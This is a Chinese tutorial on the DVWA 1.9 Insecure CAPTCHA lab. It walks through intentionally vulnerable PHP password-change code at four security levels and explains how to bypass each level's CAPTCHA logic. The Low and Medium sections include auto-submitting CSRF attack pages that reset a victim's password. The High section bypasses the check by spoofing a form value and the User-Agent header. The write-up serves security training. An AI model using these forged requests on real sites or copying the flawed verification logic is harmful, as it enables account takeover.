*本文原創作者：lonehand，轉載須註明來自FreeBuf.COM   
目前，最新的DVWA已經更新到1.9版本(http://www.dvwa.co.uk/)，而網上的教程大多停留在舊版本，且沒有針對DVWA high級別的教程，因此萌發了一個撰寫新手教程的想法，錯誤的地方還請大家指正。
DVWA簡介
DVWA(Damn Vulnerable Web Application)是一個用來進行安全脆弱性鑑定的PHP/MySQL Web應用，旨在為安全專業人員測試自己的專業技能和工具提供合法的環境，幫助web開發者更好的理解web應用安全防範的過程。
DVWA共有十個模組，分別是
Brute Force(暴力破解)
Command Injection(命令列注入)
CSRF(跨站請求偽造)
File Inclusion(檔案包含)
File Upload(檔案上傳)
Insecure CAPTCHA(不安全的驗證碼)
SQL Injection(SQL注入)
SQL Injection(Blind)(SQL盲注)
XSS(Reflected)(反射型跨站指令碼)
XSS(Stored)(儲存型跨站指令碼)
需要注意的是，DVWA 1.9的程式碼分為四種安全級別：Low，Medium，High，Impossible。初學者可以通過比較四種級別的程式碼，接觸到一些PHP程式碼審計的內容。

DVWA的搭建
Freebuf上的這篇文章《新手指南：手把手教你如何搭建自己的滲透測試環境》(http://www.freebuf.com/sectool/102661.html)已經寫得非常好了，在這裡就不贅述了。
Insecure CAPTCHA
Insecure CAPTCHA，意思是不安全的驗證碼，CAPTCHA是Completely Automated Public Turing Test to Tell Computers and Humans Apart (全自動區分計算機和人類的圖靈測試)的簡稱。但個人覺得，這一模組的內容叫做不安全的驗證流程更妥當些，因為這塊主要是驗證流程出現了邏輯漏洞，谷歌的驗證碼錶示不背這個鍋。

這一模組的驗證碼使用的是Google提供reCAPTCHA服務，下圖是驗證的具體流程。

伺服器通過呼叫recaptcha_check_answer函式檢查使用者輸入的正確性。
recaptcha_check_answer($privkey,$remoteip, $challenge,$response)
引數$privkey是伺服器申請的private key，$remoteip是使用者的ip，$challenge是recaptcha_challenge_field欄位的值，來自前端頁面，$response是recaptcha_response_field欄位的值。函式返回ReCaptchaResponse class的例項，ReCaptchaResponse類有2個屬性：$is_valid是布林型的，表示校驗是否有效，$error是返回的錯誤程式碼。
(ps:有人也許會問，那這個模組的實驗是不是需要科學上網呢?答案是不用，因為我們可以繞過驗證碼)
下面對四種級別的程式碼進行分析。在此之前，別忘了按照下圖所示設定config.inc.php中的私鑰和公鑰。

Low
伺服器端核心程式碼

<?php

if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '1' ) ) {
	// Hide the CAPTCHA form
	$hide_form = true;

	// Get input
	$pass_new  = $_POST[ 'password_new' ];
	$pass_conf = $_POST[ 'password_conf' ];

	// Check CAPTCHA from 3rd party
	$resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key' ],
		$_SERVER[ 'REMOTE_ADDR' ],
		$_POST[ 'recaptcha_challenge_field' ],
		$_POST[ 'recaptcha_response_field' ] );

	// Did the CAPTCHA fail?
	if( !$resp->is_valid ) {
		// What happens when the CAPTCHA was entered incorrectly
		$html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
		$hide_form = false;
		return;
	}
	else {
		// CAPTCHA was correct. Do both new passwords match?
		if( $pass_new == $pass_conf ) {
			// Show next stage for the user
			$html .= "
				<pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre>
				<form action=\"#\" method=\"POST\">
					<input type=\"hidden\" name=\"step\" value=\"2\" />
					<input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" />
					<input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" />
					<input type=\"submit\" name=\"Change\" value=\"Change\" />
				</form>";
		}
		else {
			// Both new passwords do not match.
			$html     .= "<pre>Both passwords must match.</pre>";
			$hide_form = false;
		}
	}
}

if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) {
	// Hide the CAPTCHA form
	$hide_form = true;

	// Get input
	$pass_new  = $_POST[ 'password_new' ];
	$pass_conf = $_POST[ 'password_conf' ];

	// Check to see if both password match
	if( $pass_new == $pass_conf ) {
		// They do!
		$pass_new = mysql_real_escape_string( $pass_new );
		$pass_new = md5( $pass_new );

		// Update database
		$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
		$result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' );

		// Feedback for the end user
		$html .= "<pre>Password Changed.</pre>";
	}
	else {
		// Issue with the passwords matching
		$html .= "<pre>Passwords did not match.</pre>";
		$hide_form = false;
	}

	mysql_close();
}

?>

可以看到，伺服器將改密操作分成了兩步，第一步檢查使用者輸入的驗證碼，驗證通過後，伺服器返回表單，第二步客戶端提交post請求，伺服器完成更改密碼的操作。但是，這其中存在明顯的邏輯漏洞，伺服器僅僅通過檢查Change、step引數來判斷使用者是否已經輸入了正確的驗證碼。    
可以通過構造引數繞過驗證過程。首先輸入密碼，點選Change按鈕，抓包，更改step引數繞過驗證碼。因為沒有翻牆，所以沒能成功顯示驗證碼，傳送的請求包中也就沒有recaptcha_challenge_field、recaptcha_response_field兩個引數。

修改密碼成功。

由於沒有任何的防CSRF機制，可以輕易地構造攻擊頁面，頁面程式碼如下(詳見CSRF模組的教程)。

<html>      

<body onload="document.getElementById('transfer').submit()">        

  <div>    

    <form method="POST" id="transfer" action="http://192.168.153.130/dvwa/vulnerabilities/captcha/">     

		<input type="hidden" name="password_new" value="password">

		<input type="hidden" name="password_conf" value="password">     

		<input type="hidden" name="step" value="2"      

		<input type="hidden" name="Change" value="Change">        

	</form>        

  </div>        

</body>

</html>

當受害者訪問這個頁面時，攻擊指令碼會偽造改密請求傳送給伺服器。

美中不足的是，受害者會看到更改密碼成功的介面(這是因為修改密碼成功後，伺服器會返回302，實現自動跳轉)，從而意識到自己遭到了攻擊。

Medium
伺服器端核心程式碼

<?php

if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '1' ) ) {
	// Hide the CAPTCHA form
	$hide_form = true;

	// Get input
	$pass_new  = $_POST[ 'password_new' ];
	$pass_conf = $_POST[ 'password_conf' ];

	// Check CAPTCHA from 3rd party
	$resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key' ],
		$_SERVER[ 'REMOTE_ADDR' ],
		$_POST[ 'recaptcha_challenge_field' ],
		$_POST[ 'recaptcha_response_field' ] );

	// Did the CAPTCHA fail?
	if( !$resp->is_valid ) {
		// What happens when the CAPTCHA was entered incorrectly
		$html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
		$hide_form = false;
		return;
	}
	else {
		// CAPTCHA was correct. Do both new passwords match?
		if( $pass_new == $pass_conf ) {
			// Show next stage for the user
			$html .= "
				<pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre>
				<form action=\"#\" method=\"POST\">
					<input type=\"hidden\" name=\"step\" value=\"2\" />
					<input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" />
					<input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" />
					<input type=\"hidden\" name=\"passed_captcha\" value=\"true\" />
					<input type=\"submit\" name=\"Change\" value=\"Change\" />
				</form>";
		}
		else {
			// Both new passwords do not match.
			$html     .= "<pre>Both passwords must match.</pre>";
			$hide_form = false;
		}
	}
}

if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) {
	// Hide the CAPTCHA form
	$hide_form = true;

	// Get input
	$pass_new  = $_POST[ 'password_new' ];
	$pass_conf = $_POST[ 'password_conf' ];

	// Check to see if they did stage 1
	if( !$_POST[ 'passed_captcha' ] ) {
		$html     .= "<pre><br />You have not passed the CAPTCHA.</pre>";
		$hide_form = false;
		return;
	}

	// Check to see if both password match
	if( $pass_new == $pass_conf ) {
		// They do!
		$pass_new = mysql_real_escape_string( $pass_new );
		$pass_new = md5( $pass_new );

		// Update database
		$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
		$result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' );

		// Feedback for the end user
		$html .= "<pre>Password Changed.</pre>";
	}
	else {
		// Issue with the passwords matching
		$html .= "<pre>Passwords did not match.</pre>";
		$hide_form = false;
	}

	mysql_close();
}

?>

可以看到，Medium級別的程式碼在第二步驗證時，參加了對引數passed_captcha的檢查，如果引數值為true，則認為使用者已經通過了驗證碼檢查，然而使用者依然可以通過偽造引數繞過驗證，本質上來說，這與Low級別的驗證沒有任何區別。
仍然可以通過抓包，更改step引數，增加passed_captcha引數，繞過驗證碼。

更改密碼成功。

依然可以實施CSRF攻擊，攻擊頁面程式碼如下。

<html>       

<body onload="document.getElementById('transfer').submit()">       

  <div>      

    <form method="POST" id="transfer" action="http://192.168.153.130/dvwa/vulnerabilities/captcha/">       

		<input type="hidden" name="password_new" value="password">

		<input type="hidden" name="password_conf" value="password">        

		<input type="hidden" name="passed_captcha" value="true">        

		<input type="hidden" name="step" value="2">       

		<input type="hidden" name="Change" value="Change">        

	</form>        

  </div>

</body>        

</html>

當受害者訪問這個頁面時，攻擊指令碼會偽造改密請求傳送給伺服器。

不過依然會跳轉到更改密碼成功的介面。

High
伺服器端核心程式碼

<?php

if( isset( $_POST[ 'Change' ] ) ) {
	// Hide the CAPTCHA form
	$hide_form = true;

	// Get input
	$pass_new  = $_POST[ 'password_new' ];
	$pass_conf = $_POST[ 'password_conf' ];

	// Check CAPTCHA from 3rd party
	$resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key' ],
		$_SERVER[ 'REMOTE_ADDR' ],
		$_POST[ 'recaptcha_challenge_field' ],
		$_POST[ 'recaptcha_response_field' ] );

	// Did the CAPTCHA fail?
	if( !$resp->is_valid && ( $_POST[ 'recaptcha_response_field' ] != 'hidd3n_valu3' || $_SERVER[ 'HTTP_USER_AGENT' ] != 'reCAPTCHA' ) ) {
		// What happens when the CAPTCHA was entered incorrectly
		$html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
		$hide_form = false;
		return;
	}
	else {
		// CAPTCHA was correct. Do both new passwords match?
		if( $pass_new == $pass_conf ) {
			$pass_new = mysql_real_escape_string( $pass_new );
			$pass_new = md5( $pass_new );

			// Update database
			$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "' LIMIT 1;";
			$result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' );

			// Feedback for user
			$html .= "<pre>Password Changed.</pre>";
		}
		else {
			// Ops. Password mismatch
			$html     .= "<pre>Both passwords must match.</pre>";
			$hide_form = false;
		}
	}

	mysql_close();
}

// Generate Anti-CSRF token
generateSessionToken();

?>

可以看到，伺服器的驗證邏輯是當$resp(這裡是指谷歌返回的驗證結果)是false，並且引數recaptcha_response_field不等於hidd3n_valu3或者http包頭的User-Agent引數不等於reCAPTCHA時，就認為驗證碼輸入錯誤，反之則認為已經通過了驗證碼的檢查。
搞清楚了驗證邏輯，剩下就是偽造繞過了，由於$resp引數我們無法控制，所以重心放在引數recaptcha_response_field、User-Agent上。

密碼修改成功。

Impossible
伺服器端核心程式碼

<?php

if( isset( $_POST[ 'Change' ] ) ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Hide the CAPTCHA form
	$hide_form = true;

	// Get input
	$pass_new  = $_POST[ 'password_new' ];
	$pass_new  = stripslashes( $pass_new );
	$pass_new  = mysql_real_escape_string( $pass_new );
	$pass_new  = md5( $pass_new );

	$pass_conf = $_POST[ 'password_conf' ];
	$pass_conf = stripslashes( $pass_conf );
	$pass_conf = mysql_real_escape_string( $pass_conf );
	$pass_conf = md5( $pass_conf );

	$pass_curr = $_POST[ 'password_current' ];
	$pass_curr = stripslashes( $pass_curr );
	$pass_curr = mysql_real_escape_string( $pass_curr );
	$pass_curr = md5( $pass_curr );

	// Check CAPTCHA from 3rd party
	$resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key' ],
		$_SERVER[ 'REMOTE_ADDR' ],
		$_POST[ 'recaptcha_challenge_field' ],
		$_POST[ 'recaptcha_response_field' ] );

	// Did the CAPTCHA fail?
	if( !$resp->is_valid ) {
		// What happens when the CAPTCHA was entered incorrectly
		$html .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
		$hide_form = false;
		return;
	}
	else {
		// Check that the current password is correct
		$data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
		$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
		$data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );
		$data->execute();

		// Do both new password match and was the current password correct?
		if( ( $pass_new == $pass_conf) && ( $data->rowCount() == 1 ) ) {
			// Update the database
			$data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );
			$data->bindParam( ':password', $pass_new, PDO::PARAM_STR );
			$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
			$data->execute();

			// Feedback for the end user - success!
			$html .= "<pre>Password Changed.</pre>";
		}
		else {
			// Feedback for the end user - failed!
			$html .= "<pre>Either your current password is incorrect or the new passwords did not match.<br />Please try again.</pre>";
			$hide_form = false;
		}
	}
}

// Generate Anti-CSRF token
generateSessionToken();

?>

可以看到，Impossible級別的程式碼增加了Anti-CSRF token機制防禦CSRF攻擊，利用PDO技術防護sql注入，驗證過程終於不再分成兩部分了，驗證碼無法繞過，同時要求使用者輸入之前的密碼，進一步加強了身份認證。